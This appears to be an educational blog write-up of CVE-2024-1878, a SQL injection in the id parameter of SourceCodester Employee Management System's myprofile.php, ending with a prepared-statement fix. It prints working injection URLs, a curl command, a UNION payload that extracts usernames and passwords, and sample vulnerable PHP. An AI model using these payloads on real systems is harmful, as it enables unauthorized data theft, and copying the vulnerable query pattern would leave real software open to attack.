In early 2024, security researchers discovered a serious SQL Injection vulnerability in the popular SourceCodester Employee Management System 1.. This flaw, now tracked as CVE-2024-1878, allows attackers to manipulate database queries and potentially gain unauthorized access or control over the system. This post will break down the vulnerability in simple language, walk you through how it works, and show you a basic exploit example. Please use this knowledge for educational purposes and always act responsibly.

CVE-2024-1878 has been rated as critical because it is easy to exploit remotely and can lead to severe consequences.

Software: SourceCodester Employee Management System 1.

- Affected File: /myprofile.php

What is SQL Injection?

SQL Injection is a flaw that lets attackers insert arbitrary database commands into a web application's query. This can lead to unauthorized data access, data modification, or even complete database takeover.

In simple terms: if a web page uses user input in its database queries without checking or filtering it, an attacker can mess with those queries and play tricks on the database.

Where is the bug?

The problem is with the /myprofile.php script in the Employee Management System. This page expects an id parameter in the URL, like this:

http://[target]/myprofile.php?id=1

But the server code does not properly sanitize the value passed to id. If you send something funny—like SQL code—instead of a plain number, the system just adds it to the database query.

Vulnerable Parameter

id

If an attacker sends

http://[target]/myprofile.php?id=1%20or%201=1

The %20 is just a space. So this is really: id=1 or 1=1

- or 1=1 is always true in SQL. This can trick the application to return ALL user profiles (or do more serious tricks if you keep exploring).

Below is a simplified version of what this PHP code might look like on the server

<?php
// Extract the id from GET request
$id = $_GET['id'];

// Build the SQL query (Vulnerable!)
$sql = "SELECT * FROM employees WHERE id = $id";  

$result = mysqli_query($conn, $sql);

while($row = mysqli_fetch_assoc($result)){
    echo $row['name'];
    // Other profile info
}
?>

The Problem

The code *directly* uses user input ($id) in the SQL query. If you send 1 or 1=1, the query becomes:

SELECT * FROM employees WHERE id = 1 or 1=1

This returns ALL records in the employees table, not just the one with id=1.

Attackers can open their browser and simply enter a URL like

http://[target]/myprofile.php?id=1%20or%201=1

Or use a tool like curl

curl "http://[target]/myprofile.php?id=1%20or%201=1"

This would cause the web server to execute the malicious SQL and likely dump all profiles or sensitive data.

Worse, attackers could use SQL UNION-based injection or extract the entire database schema if error messages are verbose.

A more advanced attacker can do something like

http://[target]/myprofile.php?id=-1+UNION+SELECT+1,username,password,4,5+FROM+users--

*Note*: Column numbers and table names might need adjusting depending on the database schema.

Exploit Disclosure (VulDB):

https://vuldb.com/?id.254726

CVE Entry:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1878

SourceCodester Employee Management System:

https://www.sourcecodester.com/php/15684/employee-management-system-php-source-code.html

OWASP SQL Injection:

https://owasp.org/www-community/attacks/SQL_Injection

How to Fix

To protect your application, never trust user input—always sanitize and use prepared statements. Here’s how you can clean up the original PHP code:

<?php
// Always use prepared statements!
$id = $_GET['id'];

// Prepare the statement
$stmt = $conn->prepare("SELECT * FROM employees WHERE id = ?");
$stmt->bind_param("i", $id); // 'i' means integer

$stmt->execute();
$result = $stmt->get_result();

while($row = $result->fetch_assoc()) {
    echo $row['name'];
    // show other fields
}
?>

Conclusion

CVE-2024-1878 in SourceCodester Employee Management System 1. shows how deadly even simple SQL injection flaws can be. Attackers can exploit this hole to dump data, steal accounts, or escalate their attacks. If you use or maintain the Employee Management System, update your code as soon as possible or check for a patched version.

Stay safe—never trust user input, and always validate or parameterize your queries!


Disclaimer:
This post is for educational awareness. Do not use this information for illegal purposes. Always get explicit permission before testing systems for vulnerabilities.


If you found this write-up useful, share it with your fellow developers and sysadmins so we can all build safer software!

Timeline

Published on: 02/26/2024 16:27:54 UTC
Last modified on: 02/29/2024 09:15:06 UTC